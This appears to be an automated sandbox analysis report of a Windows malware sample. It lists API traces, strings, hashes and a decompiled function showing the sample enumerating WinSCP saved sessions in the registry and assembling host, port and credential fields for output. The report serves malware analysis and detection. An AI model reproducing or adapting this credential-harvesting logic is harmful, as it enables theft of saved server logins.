0x0041bdb0
0x0041bdd2
0x0041bdee
0x00000000
0x00000000
0x0041bdfe
0x0041be16
0x0041c124
0x0041c124
0x0041c12c
0x0041c12f
0x0041c12f
0x00000000
0x00000000
0x00000000
0x00000000
0x0041be1c
0x0041be1c
0x0041be22
0x0041be28
0x0041be30
0x0041be3c
0x0041be42
0x0041be49
0x0041be4f
0x0041be74
0x0041be82
0x0041be88
0x0041beb5
0x0041bebb
0x0041bec1
0x0041bec3
0x0041bf1b
0x0041bec5
0x0041bed9
0x0041bede
0x0041bee9
0x0041beeb
0x0041beeb
0x0041beef
0x0041bef5
0x0041bf02
0x0041bf0a
0x0041bf0b
0x0041bf10
0x0041bf10
0x0041bf02
0x0041bf27
0x0041bf2d
0x0041bf34
0x0041bf3a
0x0041bf5f
0x0041bf6d
0x0041bf78
0x0041bf7e
0x0041bf84
0x0041bf8a
0x0041bfaf
0x0041bfb6
0x0041bfc2
0x0041bfc8
0x0041bfcf
0x0041bfe1
0x0041bfe7
0x0041bfe9
0x0041c011
0x0041c01d
0x0041c021
0x0041c02d
0x0041c031
0x0041c039
0x0041c03a
0x0041c03f
0x0041c03f
0x0041c049
0x0041c04f
0x0041c055
0x0041c05b
0x0041c061
0x0041c063
0x0041c063
0x0041c06b
0x0041c06b
0x0041c077
0x0041c08e
0x0041c097
0x0041c0a4
0x0041c0bd
0x0041c0bf
0x0041c0c5
0x0041c0cd
0x0041c0db
0x0041c0e0
0x0041c0ea
0x0041c0f1
0x0041c0f9
0x0041c0fa
0x0041c0ff
0x0041c0ff
0x0041c102
0x0041c10c
0x0041c112
0x0041c118
0x00000000
0x0041be1c
0x0041bdb3
0x0041bdb9
0x0041bdbb
0x00000000
0x0041bdbb
0x0041bdac

APIs

_memset.LIBCMT ref: 0041BB42
_memset.LIBCMT ref: 0041BB64
_memset.LIBCMT ref: 0041BB7C
_memset.LIBCMT ref: 0041BB94
_memset.LIBCMT ref: 0041BBA7
_memset.LIBCMT ref: 0041BBB5
_memset.LIBCMT ref: 0041BBC6
RegOpenKeyExW.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0041BBF4
_strlen.LIBCMT ref: 0041BC20
_strlen.LIBCMT ref: 0041BC56

Part of subcall function 00423960: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,?,?,0040AE75,?,?,?), ref: 0042398E
Part of subcall function 00423960: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 004239C4
Part of subcall function 00423960: _wcslen.LIBCMT ref: 004239E1

RegGetValueW.ADVAPI32(?,00000000,00000000,00000010,00000000,?,00000000,?,?,?,?,025C9C70,00000000,00000000), ref: 0041BCDC
RegCloseKey.ADVAPI32(?,?), ref: 0041BDB3
RegCloseKey.ADVAPI32(?,?), ref: 0041BDC6
RegOpenKeyExW.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?), ref: 0041BDE6
RegEnumKeyExA.ADVAPI32(?,00000000,025C6C28,00000104,00000000,00000000,00000000,00000000), ref: 0041BE0E
lstrcat.KERNEL32(025C6320,00443C5C), ref: 0041BE22
lstrcat.KERNEL32(025C6320,025C9CD0), ref: 0041BE30
lstrcat.KERNEL32(025C6320,00443C5C), ref: 0041BE3C
lstrcat.KERNEL32(025C6320,025C8880), ref: 0041BE49
RegGetValueA.ADVAPI32(?,025C6C28,025C9E50,00000002,00000000,?,?), ref: 0041BE74
lstrcat.KERNEL32(025C6320,?), ref: 0041BE82
RegGetValueA.ADVAPI32(?,025C6C28,025C9DD8,0000FFFF,00000000,00000000,?), ref: 0041BEBB
lstrcat.KERNEL32(025C6320,00000000), ref: 0041BEEF
lstrcat.KERNEL32(025C6320,:22), ref: 0041BF1B
lstrcat.KERNEL32(025C6320,00443C5C), ref: 0041BF27
lstrcat.KERNEL32(025C6320,025C8690), ref: 0041BF34
RegGetValueA.ADVAPI32(?,025C6C28,025C9E20,00000002,00000000,?,?), ref: 0041BF5F
lstrcat.KERNEL32(025C6320,?), ref: 0041BF6D
RegGetValueA.ADVAPI32(?,025C6C28,025C9C40,00000002,00000000,?,?), ref: 0041BFB6
lstrcat.KERNEL32(025C6320,00443C5C), ref: 0041BFC2
lstrcat.KERNEL32(025C6320,025C9270), ref: 0041BFCF
StrCmpCA.SHLWAPI(?,00443C1C), ref: 0041BFE1
lstrcat.KERNEL32(025C6320,?), ref: 0041C06B
lstrcat.KERNEL32(025C6320,004458A8), ref: 0041C077

Part of subcall function 00423BF0: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00423D5C

RegEnumKeyExA.ADVAPI32(?,?,025C6C28,00000104,00000000,00000000,00000000,00000000), ref: 0041C0AE
_memset.LIBCMT ref: 0041C0BF
_memset.LIBCMT ref: 0041C0CD
_memset.LIBCMT ref: 0041C0DB
RegCloseKey.ADVAPI32(?), ref: 0041C12F

Strings

Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0041BBD8
Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 0041BDDC
:22, xrefs: 0041BF15

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$_memset$Value$Close$ByteCharEnumMultiOpenWide_strlen$Ios_base_dtor_wcslenstd::ios_base::_
String ID: :22$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions
API String ID: 1977166040-2123096617
Opcode ID: 6a227d1a30e81d3872cf42e63e744fb2a3fe62f6e157690970f468f707186f49
Instruction ID: 32d597cfcdb8e6165c20a6f8e1482033015f151b210a8b3b962d5f1920fda1bc
Opcode Fuzzy Hash: 6a227d1a30e81d3872cf42e63e744fb2a3fe62f6e157690970f468f707186f49
Instruction Fuzzy Hash: 8C023EB1900269AFDB20DB95DC84FDAB7B8AB45304F0045DBE509A3241EB746F84CF7A

Uniqueness

Uniqueness Score: -1.00%

Function 0041CA40 Relevance: 62.0, APIs: 34, Strings: 1, Instructions: 727
stringCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E0041CA40(void* __eflags, intOrPtr _a4) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v1020;
				intOrPtr _v1028;
				char _v1032;
				signed char _v1048;
				intOrPtr _v1056;
				char _v1060;
				char _v1076;
				intOrPtr _v1084;
				char _v1088;
				signed char _v1104;
				intOrPtr _v1112;
				char _v1116;
				char _v1132;
				intOrPtr _v1140;
				char _v1144;
				char _v1160;
				intOrPtr _v1168;
				char _v1172;
				char _v1188;
				intOrPtr _v1196;
				char _v1200;
				char _v1216;
				intOrPtr _v1224;
				char _v1244;
				void* _v1245;
				char _v1252;
				char _v1256;
				intOrPtr _v1260;
				signed int _v1264;
				char _v1268;
				intOrPtr _v1272;
				char _v1344;
				char _v1448;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t234;
				signed int _t235;
				void* _t239;
				intOrPtr _t241;
				void* _t243;
				void* _t248;
				intOrPtr* _t249;
				intOrPtr* _t253;
				intOrPtr _t265;
				void* _t266;
				void* _t267;
				intOrPtr _t268;
				void* _t269;
				void* _t270;
				intOrPtr _t271;
				void* _t272;
				void* _t273;
				intOrPtr _t274;
				void* _t275;
				intOrPtr _t276;
				intOrPtr _t278;
				signed int _t279;
				intOrPtr _t283;
				signed int _t284;
				intOrPtr _t288;
				signed int _t289;
				intOrPtr _t293;
				signed int _t294;
				signed int _t295;
				intOrPtr _t300;
				void* _t302;
				intOrPtr* _t303;
				signed char _t307;
				intOrPtr _t310;
				char* _t312;
				void* _t321;
				intOrPtr _t331;
				intOrPtr _t346;
				intOrPtr _t352;
				intOrPtr _t359;
				void* _t370;
				void* _t371;
				intOrPtr* _t372;
				intOrPtr _t396;
				char* _t407;
				char* _t408;
				signed char _t409;
				char* _t410;
				signed char _t419;
				void* _t420;
				char* _t422;
				intOrPtr _t428;
				void* _t429;
				signed int _t430;
				intOrPtr _t435;
				void* _t436;
				signed int _t437;
				intOrPtr _t441;
				void* _t442;
				signed int _t443;
				intOrPtr _t455;
				intOrPtr _t458;
				intOrPtr _t459;
				void* _t460;
				signed char _t464;
				signed char _t465;
				signed char _t466;
				signed char _t467;
				signed char _t468;
				signed char _t469;
				signed char _t470;
				signed char _t471;
				signed char _t472;
				void* _t475;
				void* _t476;
				signed int _t477;
				intOrPtr _t479;
				intOrPtr _t480;
				intOrPtr _t481;
				intOrPtr _t482;
				signed char _t484;
				signed char _t486;
				signed char _t487;
				signed char _t488;
				void* _t489;
				void* _t491;
				intOrPtr _t497;
				signed int _t501;
				intOrPtr _t502;
				intOrPtr _t503;
				intOrPtr _t504;
				intOrPtr _t505;
				signed char _t506;
				signed char _t507;
				intOrPtr* _t508;
				void* _t509;
				signed int _t510;
				void* _t511;
				signed int _t512;
				void* _t513;
				signed int _t514;
				signed int _t515;
				void* _t516;
				void* _t518;
				void* _t519;
				void* _t520;
				void* _t522;
				void* _t523;
				void* _t524;
				char* _t525;
				void* _t526;
				void* _t527;
				void* _t528;
				void* _t529;
				void* _t530;
				signed int _t575;
				signed int _t582;
				signed int _t589;
				signed int _t596;
				signed int _t597;

				_t234 =  *0x451f00; // 0xc21d6f0a
				_t235 = _t234 ^ _t515;
				_v20 = _t235;
				 *[fs:0x0] =  &_v16;
				_v1260 = _a4;
				E0042A2F0( &_v1020, 0, 0x3e8);
				_t239 = E00420650(_t370, _t475, 0, 0x28);
				_t518 = _t516 - 0x598 + 0x10;
				 *0x464860( &_v1020, _t239, _t235, _t475, _t489, _t370,  *[fs:0x0], E0043F27E, 0xffffffff);
				_t241 =  *0x4534a8; // 0x25c6750
				 *0x464860( &_v1020, _t241);
				_t450 =  &_v1020;
				_t243 = E004205C0( &_v1020); // executed
				if(_t243 == 0) {
					L134:
					 *[fs:0x0] = _v16;
					_pop(_t476);
					_pop(_t491);
					_pop(_t371);
					__eflags = _v20 ^ _t515;
					return E0042A36A(_t243, _t371, _v20 ^ _t515, _t450, _t476, _t491);
				} else {
					E0041C710( &_v1448,  &_v1020, 1, 0x40, 1);
					_v8 = 0;
					_v1028 = 0xf;
					_v1032 = 0;
					_v1048 = 0;
					_v1252 = 0;
					_v1140 = 0xf;
					_v1144 = 0;
					_v1160 = 0;
					_v1112 = 0xf;
					_v1116 = 0;
					_v1132 = 0;
					_v1084 = 0xf;
					_v1088 = 0;
					_v1104 = 0;
					_v1056 = 0xf;
					_v1060 = 0;
					_v1076 = 0;
					_v8 = 5;
					goto L2;
					L8:
					_v1256 =  *((intOrPtr*)( *((intOrPtr*)( *_t372 + 0x18))))(0xa);
					_t253 = E00419810( &_v1448,  &_v1048, _v1256);
					_t396 =  *((intOrPtr*)( *_t253 + 4));
					_t450 =  *(_t396 + _t253 + 0xc) & 0x00000006;
					_t520 = _t519 + 0xc;
					asm("sbb eax, eax");
					if((_t396 + _t253 &  !( ~( *(_t396 + _t253 + 0xc) & 0x00000006))) == 0) {
						__eflags = _v1056 - 0x10;
						if(_v1056 >= 0x10) {
							_push(_v1076);
							E0042A289();
							_t520 = _t520 + 4;
						}
						_v1056 = 0xf;
						_v1060 = 0;
						_v1076 = 0;
						__eflags = _v1084 - 0x10;
						if(_v1084 >= 0x10) {
							_t450 = _v1104;
							_push(_v1104);
							E0042A289();
							_t520 = _t520 + 4;
						}
						_v1084 = 0xf;
						_v1088 = 0;
						_v1104 = 0;
						__eflags = _v1112 - 0x10;
						if(_v1112 >= 0x10) {
							_push(_v1132);
							E0042A289();
							_t520 = _t520 + 4;
						}
						_v1112 = 0xf;
						_v1116 = 0;
						_v1132 = 0;
						__eflags = _v1140 - 0x10;
						if(_v1140 >= 0x10) {
							_push(_v1160);
							E0042A289();
							_t520 = _t520 + 4;
						}
						_v1140 = 0xf;
						_v1144 = 0;
						_v1160 = 0;
						__eflags = _v1028 - 0x10;
						if(_v1028 >= 0x10) {
							_t450 = _v1048;
							_push(_v1048);
							E0042A289();
							_t520 = _t520 + 4;
						}
						_v1028 = 0xf;
						_v1032 = 0;
						_v1048 = 0;
						_v8 = 0xffffffff;
						E0041C880( &_v1344, 0);
						_v1344 = 0x445de4;
						_t243 = E00429F19( &_v1344);
						goto L134;
					} else {
						_t265 =  *0x4533f8; // 0x25c65d0
						_t266 = E0042BC70(_t265);
						_t522 = _t520 + 4;
						_t267 = E0040A2A0( &_v1048, _t265, _v1252 + 1, _t266);
						_t374 = _t267;
						if(_t267 != 0xffffffff) {
							E00404410( &_v1048, 0, 9);
							_t359 = _v1028;
							_t488 = _v1048;
							_t470 = _t488;
							if(_t359 < 0x10) {
								_t470 =  &_v1048;
							}
							_t441 = _v1032;
							_t513 = _t470 + _t441;
							_t471 = _t488;
							if(_t359 < 0x10) {
								_t471 =  &_v1048;
							}
							_t63 = _t441 - 7; // -7
							_t442 = _t471 + _t63;
							_t472 = _t488;
							if(_t359 < 0x10) {
								_t472 =  &_v1048;
							}
							if(_t442 != 0) {
								_t361 = _t442 - _t472;
								__eflags = _t442 - _t472;
							} else {
								_t361 = 0;
							}
							if(_t513 != 0) {
								_t514 = _t513 - _t442;
								__eflags = _t514;
								_t443 = _t514;
							} else {
								_t443 = 0;
							}
							E00404410( &_v1048, _t361, _t443);
							E00404AD0( &_v1160,  &_v1048, 0, 0xffffffff);
						}
						_t268 =  *0x4536e4; // 0x25c64e0
						_t269 = E0042BC70(_t268);
						_t523 = _t522 + 4;
						_t270 = E0040A2A0( &_v1048, _t268, _t374 + 1, _t269);
						_t376 = _t270;
						if(_t270 != 0xffffffff) {
							E00404410( &_v1048, 0, 9);
							_t352 = _v1028;
							_t487 = _v1048;
							_t467 = _t487;
							if(_t352 < 0x10) {
								_t467 =  &_v1048;
							}
							_t435 = _v1032;
							_t511 = _t435 + _t467;
							_t468 = _t487;
							if(_t352 < 0x10) {
								_t468 =  &_v1048;
							}
							_t436 = _t435 + _t468 - 7;
							_t469 = _t487;
							if(_t352 < 0x10) {
								_t469 =  &_v1048;
							}
							if(_t436 != 0) {
								_t354 = _t436 - _t469;
								__eflags = _t436 - _t469;
							} else {
								_t354 = 0;
							}
							if(_t511 != 0) {
								_t512 = _t511 - _t436;
								__eflags = _t512;
								_t437 = _t512;
							} else {
								_t437 = 0;
							}
							E00404410( &_v1048, _t354, _t437);
							E00404AD0( &_v1132,  &_v1048, 0, 0xffffffff);
						}
						_t271 =  *0x453878; // 0x25c65b0
						_t272 = E0042BC70(_t271);
						_t524 = _t523 + 4;
						_t273 = E0040A2A0( &_v1048, _t271, _t376 + 1, _t272);
						_t378 = _t273;
						if(_t273 != 0xffffffff) {
							E00404410( &_v1048, 0, 9);
							_t346 = _v1028;
							_t486 = _v1048;
							_t464 = _t486;
							if(_t346 < 0x10) {
								_t464 =  &_v1048;
							}
							_t428 = _v1032;
							_t509 = _t464 + _t428;
							_t465 = _t486;
							if(_t346 < 0x10) {
								_t465 =  &_v1048;
							}
							_t91 = _t428 - 7; // -7
							_t429 = _t465 + _t91;
							_t466 = _t486;
							if(_t346 < 0x10) {
								_t466 =  &_v1048;
							}
							if(_t429 != 0) {
								_t348 = _t429 - _t466;
								__eflags = _t429 - _t466;
							} else {
								_t348 = 0;
							}
							if(_t509 != 0) {
								_t510 = _t509 - _t429;
								__eflags = _t510;
								_t430 = _t510;
							} else {
								_t430 = 0;
							}
							E00404410( &_v1048, _t348, _t430);
							E00404AD0( &_v1104,  &_v1048, 0, 0xffffffff);
						}
						_t274 =  *0x4538bc; // 0x25c6788
						_t275 = E0042BC70(_t274);
						_t525 = _t524 + 4;
						_t276 = E0040A2A0( &_v1048, _t274, _t378 + 1, _t275);
						_v1252 = _t276;
						if(_t276 != 0xffffffff) {
							E00404410( &_v1048, 0, 0x1b);
							_t331 = _v1028;
							_t484 = _v1048;
							_t419 = _t484;
							if(_t331 < 0x10) {
								_t419 =  &_v1048;
							}
							_t459 = _v1032;
							_t420 = _t419 + _t459;
							_t506 = _t484;
							if(_t331 < 0x10) {
								_t506 =  &_v1048;
							}
							_t105 = _t459 - 7; // -7
							_t460 = _t506 + _t105;
							_t507 = _t484;
							if(_t331 < 0x10) {
								_t507 =  &_v1048;
							}
							if(_t460 != 0) {
								_t333 = _t460 - _t507;
								__eflags = _t460 - _t507;
							} else {
								_t333 = 0;
							}
							if(_t420 != 0) {
								_t420 = _t420 - _t460;
							}
							E00404410( &_v1048, _t333, _t420);
							_t525 = _t525 - 0x1c;
							_t422 = _t525;
							_v1272 = _t525;
							 *((intOrPtr*)(_t422 + 0x14)) = 0xf;
							 *((intOrPtr*)(_t422 + 0x10)) = 0;
							 *_t422 = 0;
							E00404AD0(_t422,  &_v1048, 0, 0xffffffff);
							_push( &_v1244);
							_t508 = E00423470();
							if( &_v1076 != _t508) {
								if(_v1056 >= 0x10) {
									_push(_v1076);
									E0042A289();
									_t525 = _t525 + 4;
								}
								_v1056 = 0xf;
								_v1060 = 0;
								_v1076 = 0;
								if( *((intOrPtr*)(_t508 + 0x14)) >= 0x10) {
									_v1076 =  *_t508;
									 *_t508 = 0;
								} else {
									E0042C040( &_v1076, _t508,  *((intOrPtr*)(_t508 + 0x10)) + 1);
									_t525 = _t525 + 0xc;
								}
								_v1060 =  *((intOrPtr*)(_t508 + 0x10));
								_v1056 =  *((intOrPtr*)(_t508 + 0x14));
								 *((intOrPtr*)(_t508 + 0x10)) = 0;
								 *((intOrPtr*)(_t508 + 0x14)) = 0;
							}
							_v8 = 5;
							if(_v1224 >= 0x10) {
								_push(_v1244);
								E0042A289();
								_t525 = _t525 + 4;
							}
						}
						_t497 = E0042BC70(0x443c1c);
						_t278 = _v1144;
						_t526 = _t525 + 4;
						_t479 = _t278;
						if(_t278 >= _t497) {
							_t278 = _t497;
						}
						_t407 = _v1160;
						if(_v1140 < 0x10) {
							_t407 =  &_v1160;
						}
						_t279 = E0042A379(_t407, 0x443c1c, _t278);
						_t518 = _t526 + 0xc;
						if(_t279 == 0) {
							if(_t479 >= _t497) {
								__eflags = _t479 - _t497;
								_t138 = _t479 != _t497;
								__eflags = _t138;
								_t279 = 0 | _t138;
							} else {
								_t279 = _t279 | 0xffffffff;
							}
							_t575 = _t279;
						}
						if(((_t279 & 0xffffff00 | _t575 == 0x00000000) & 0xffffff00 | (_t279 & 0xffffff00 | _t575 == 0x00000000) == 0x00000000) != 0) {
							_t502 = E0042BC70(0x443c1c);
							_t283 = _v1116;
							_t527 = _t518 + 4;
							_t480 = _t283;
							if(_t283 >= _t502) {
								_t283 = _t502;
							}
							_t408 = _v1132;
							if(_v1112 < 0x10) {
								_t408 =  &_v1132;
							}
							_t284 = E0042A379(_t408, 0x443c1c, _t283);
							_t518 = _t527 + 0xc;
							if(_t284 == 0) {
								if(_t480 >= _t502) {
									__eflags = _t480 - _t502;
									_t148 = _t480 != _t502;
									__eflags = _t148;
									_t284 = 0 | _t148;
								} else {
									_t284 = _t284 | 0xffffffff;
								}
								_t582 = _t284;
							}
							if(((_t284 & 0xffffff00 | _t582 == 0x00000000) & 0xffffff00 | (_t284 & 0xffffff00 | _t582 == 0x00000000) == 0x00000000) != 0) {
								_t503 = E0042BC70(0x443c1c);
								_t288 = _v1088;
								_t528 = _t518 + 4;
								_t481 = _t288;
								if(_t288 >= _t503) {
									_t288 = _t503;
								}
								_t409 = _v1104;
								if(_v1084 < 0x10) {
									_t409 =  &_v1104;
								}
								_t289 = E0042A379(_t409, 0x443c1c, _t288);
								_t518 = _t528 + 0xc;
								if(_t289 == 0) {
									if(_t481 >= _t503) {
										__eflags = _t481 - _t503;
										_t158 = _t481 != _t503;
										__eflags = _t158;
										_t289 = 0 | _t158;
									} else {
										_t289 = _t289 | 0xffffffff;
									}
									_t589 = _t289;
								}
								if(((_t289 & 0xffffff00 | _t589 == 0x00000000) & 0xffffff00 | (_t289 & 0xffffff00 | _t589 == 0x00000000) == 0x00000000) != 0) {
									_t504 = E0042BC70(0x443c1c);
									_t293 = _v1060;
									_t529 = _t518 + 4;
									_t482 = _t293;
									if(_t293 >= _t504) {
										_t293 = _t504;
									}
									_t410 = _v1076;
									if(_v1056 < 0x10) {
										_t410 =  &_v1076;
									}
									_t294 = E0042A379(_t410, 0x443c1c, _t293);
									_t518 = _t529 + 0xc;
									if(_t294 == 0) {
										if(_t482 >= _t504) {
											__eflags = _t482 - _t504;
											_t168 = _t482 != _t504;
											__eflags = _t168;
											_t294 = 0 | _t168;
										} else {
											_t294 = _t294 | 0xffffffff;
										}
										_t596 = _t294;
									}
									_t295 = _t294 & 0xffffff00 | _t596 == 0x00000000;
									_t597 = _t295;
									_t598 = _t295 & 0xffffff00 | _t597 == 0x00000000;
									if((_t295 & 0xffffff00 | _t597 == 0x00000000) != 0) {
										_t505 = _v1260;
										 *0x464860(_t505, "\n");
										_t455 =  *0x453b08; // 0x25c6050
										 *0x464860(_t505, _t455);
										 *0x464860(_t505, "\n");
										_t300 =  *0x453ac0; // 0x25c8880
										 *0x464860(_t505, _t300);
										_t302 = E0040D100(_t598,  &_v1188,  &_v1160, ":");
										_v8 = 8;
										_t303 = E004124E0( &_v1132,  &_v1216, _t302,  &_v1132);
										_t530 = _t518 + 0x18;
										_v8 = 9;
										if( *((intOrPtr*)(_t303 + 0x14)) >= 0x10) {
											_t303 =  *_t303;
										}
										 *0x464860(_t505, _t303);
										if(_v1196 >= 0x10) {
											_push(_v1216);
											E0042A289();
											_t530 = _t530 + 4;
										}
										_v1196 = 0xf;
										_v1200 = 0;
										_v1216 = 0;
										_v8 = 5;
										if(_v1168 >= 0x10) {
											_push(_v1188);
											E0042A289();
											_t530 = _t530 + 4;
										}
										_v1168 = 0xf;
										_v1172 = 0;
										_v1188 = 0;
										 *0x464860(_t505, "\n");
										_t458 =  *0x453578; // 0x25c8690
										 *0x464860(_t505, _t458);
										_t307 = _v1104;
										if(_v1084 < 0x10) {
											_t307 =  &_v1104;
										}
										 *0x464860(_t505, _t307);
										 *0x464860(_t505, "\n");
										_t310 =  *0x453a7c; // 0x25c9270
										 *0x464860(_t505, _t310);
										_t312 = _v1076;
										if(_v1056 < 0x10) {
											_t312 =  &_v1076;
										}
										 *0x464860(_t505, _t312);
										 *0x464860(_t505, "\n\n");
										E00404BC0( &_v1160, 0x443c1c, E0042BC70(0x443c1c));
										E00404BC0( &_v1132, 0x443c1c, E0042BC70(0x443c1c));
										E00404BC0( &_v1104, 0x443c1c, E0042BC70(0x443c1c));
										_t321 = E0042BC70(0x443c1c);
										_t518 = _t530 + 0x10;
										E00404BC0( &_v1076, 0x443c1c, _t321);
										 *0x453da0 =  *0x453da0 + 1;
									}
								}
							}
						}
						L2:
						_t248 = E00414D10(_t515 +  *((intOrPtr*)(_v1448 + 4)) - 0x5a4,  &_v1264);
						_v8 = 6;
						_t249 = E00418BC0(_t248);
						_t477 = _v1264;
						_t519 = _t518 + 4;
						_t372 = _t249;
						_v8 = 5;
						if(_t477 != 0) {
							asm("sbb esi, esi");
							E00429A43( &_v1268);
							_t501 =  !( ~( *(_t477 + 4))) & _t477;
							if(_t501 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t501))))(1);
							}
						}
						goto L8;
					}
				}
			}

0x0041ca57
0x0041ca5c
0x0041ca5e
0x0041ca68
0x0041ca80
0x0041ca86
0x0041ca8d
0x0041ca92
0x0041ca9d
0x0041caa3
0x0041cab0
0x0041cab6
0x0041cac3
0x0041caca
0x0041d433
0x0041d436
0x0041d43e
0x0041d43f
0x0041d440
0x0041d444
0x0041d44e
0x0041cad0
0x0041cae3
0x0041caed
0x0041caf0
0x0041caf6
0x0041cafc
0x0041cb03
0x0041cb09
0x0041cb0f
0x0041cb15
0x0041cb1c
0x0041cb22
0x0041cb28
0x0041cb2f
0x0041cb35
0x0041cb3b
0x0041cb42
0x0041cb48
0x0041cb4e
0x0041cb55
0x0041cb55
0x0041cbd8
0x0041cbe3
0x0041cbfe
0x0041cc05
0x0041cc0e
0x0041cc14
0x0041cc19
0x0041cc1f
0x0041d32f
0x0041d335
0x0041d33d
0x0041d33e
0x0041d343
0x0041d343
0x0041d34d
0x0041d353
0x0041d359
0x0041d360
0x0041d366
0x0041d368
0x0041d36e
0x0041d36f
0x0041d374
0x0041d374
0x0041d377
0x0041d37d
0x0041d383
0x0041d38a
0x0041d390
0x0041d398
0x0041d399
0x0041d39e
0x0041d39e
0x0041d3a1
0x0041d3a7
0x0041d3ad
0x0041d3b4
0x0041d3ba
0x0041d3c2
0x0041d3c3
0x0041d3c8
0x0041d3c8
0x0041d3cb
0x0041d3d1
0x0041d3d7
0x0041d3de
0x0041d3e4
0x0041d3e6
0x0041d3ec
0x0041d3ed
0x0041d3f2
0x0041d3f2
0x0041d3fb
0x0041d401
0x0041d407
0x0041d40e
0x0041d415
0x0041d421
0x0041d42b
0x00000000
0x0041cc25
0x0041cc25
0x0041cc2d
0x0041cc38
0x0041cc45
0x0041cc4a
0x0041cc4f
0x0041cc5f
0x0041cc64
0x0041cc6a
0x0041cc70
0x0041cc75
0x0041cc77
0x0041cc77
0x0041cc7d
0x0041cc83
0x0041cc86
0x0041cc8b
0x0041cc8d
0x0041cc8d
0x0041cc93
0x0041cc93
0x0041cc97
0x0041cc9c
0x0041cc9e
0x0041cc9e
0x0041cca6
0x0041ccae
0x0041ccae
0x0041cca8
0x0041cca8
0x0041cca8
0x0041ccb2
0x0041ccb8
0x0041ccb8
0x0041ccba
0x0041ccb4
0x0041ccb4
0x0041ccb4
0x0041ccc4
0x0041ccda
0x0041ccda
0x0041ccdf
0x0041cce7
0x0041ccec
0x0041ccf9
0x0041ccfe
0x0041cd03
0x0041cd13
0x0041cd18
0x0041cd1e
0x0041cd24
0x0041cd29
0x0041cd2b
0x0041cd2b
0x0041cd31
0x0041cd37
0x0041cd3a
0x0041cd3f
0x0041cd41
0x0041cd41
0x0041cd47
0x0041cd4b
0x0041cd50
0x0041cd52
0x0041cd52
0x0041cd5a
0x0041cd62
0x0041cd62
0x0041cd5c
0x0041cd5c
0x0041cd5c
0x0041cd66
0x0041cd6c
0x0041cd6c
0x0041cd6e
0x0041cd68
0x0041cd68
0x0041cd68
0x0041cd78
0x0041cd8e
0x0041cd8e
0x0041cd93
0x0041cd9b
0x0041cda0
0x0041cdad
0x0041cdb2
0x0041cdb7
0x0041cdc7
0x0041cdcc
0x0041cdd2
0x0041cdd8
0x0041cddd
0x0041cddf
0x0041cddf
0x0041cde5
0x0041cdeb
0x0041cdee
0x0041cdf3
0x0041cdf5
0x0041cdf5
0x0041cdfb
0x0041cdfb
0x0041cdff
0x0041ce04
0x0041ce06
0x0041ce06
0x0041ce0e
0x0041ce16
0x0041ce16
0x0041ce10
0x0041ce10
0x0041ce10
0x0041ce1a
0x0041ce20
0x0041ce20
0x0041ce22
0x0041ce1c
0x0041ce1c
0x0041ce1c
0x0041ce2c
0x0041ce42
0x0041ce42
0x0041ce47
0x0041ce4f
0x0041ce54
0x0041ce61
0x0041ce66
0x0041ce6f
0x0041ce7f
0x0041ce84
0x0041ce8a
0x0041ce90
0x0041ce95
0x0041ce97
0x0041ce97
0x0041ce9d
0x0041cea3
0x0041cea5
0x0041ceaa
0x0041ceac
0x0041ceac
0x0041ceb2
0x0041ceb2
0x0041ceb6
0x0041cebb
0x0041cebd
0x0041cebd
0x0041cec5
0x0041cecd
0x0041cecd
0x0041cec7
0x0041cec7
0x0041cec7
0x0041ced1
0x0041ced3
0x0041ced3
0x0041cedd
0x0041cee2
0x0041cee5
0x0041cee7
0x0041cefd
0x0041cf00
0x0041cf04
0x0041cf07
0x0041cf12
0x0041cf1e
0x0041cf28
0x0041cf31
0x0041cf39
0x0041cf3a
0x0041cf3f
0x0041cf3f
0x0041cf42
0x0041cf48
0x0041cf4e
0x0041cf59
0x0041cf74
0x0041cf7a
0x0041cf5b
0x0041cf68
0x0041cf6d
0x0041cf6d
0x0041cf7f
0x0041cf88
0x0041cf8e
0x0041cf91
0x0041cf91
0x0041cf9b
0x0041cf9f
0x0041cfa7
0x0041cfa8
0x0041cfad
0x0041cfad
0x0041cf9f
0x0041cfba
0x0041cfbc
0x0041cfc2
0x0041cfc5
0x0041cfc9
0x0041cfcb
0x0041cfcb
0x0041cfd4
0x0041cfda
0x0041cfdc
0x0041cfdc
0x0041cfe9
0x0041cfee
0x0041cff3
0x0041cff7
0x0041d000
0x0041d002
0x0041d002
0x0041d002
0x0041cff9
0x0041cff9
0x0041cff9
0x0041d005
0x0041d005
0x0041d011
0x0041d021
0x0041d023
0x0041d029
0x0041d02c
0x0041d030
0x0041d032
0x0041d032
0x0041d03b
0x0041d041
0x0041d043
0x0041d043
0x0041d050
0x0041d055
0x0041d05a
0x0041d05e
0x0041d067
0x0041d069
0x0041d069
0x0041d069
0x0041d060
0x0041d060
0x0041d060
0x0041d06c
0x0041d06c
0x0041d078
0x0041d088
0x0041d08a
0x0041d090
0x0041d093
0x0041d097
0x0041d099
0x0041d099
0x0041d0a2
0x0041d0a8
0x0041d0aa
0x0041d0aa
0x0041d0b7
0x0041d0bc
0x0041d0c1
0x0041d0c5
0x0041d0ce
0x0041d0d0
0x0041d0d0
0x0041d0d0
0x0041d0c7
0x0041d0c7
0x0041d0c7
0x0041d0d3
0x0041d0d3
0x0041d0df
0x0041d0ef
0x0041d0f1
0x0041d0f7
0x0041d0fa
0x0041d0fe
0x0041d100
0x0041d100
0x0041d109
0x0041d10f
0x0041d111
0x0041d111
0x0041d11e
0x0041d123
0x0041d128
0x0041d12c
0x0041d135
0x0041d137
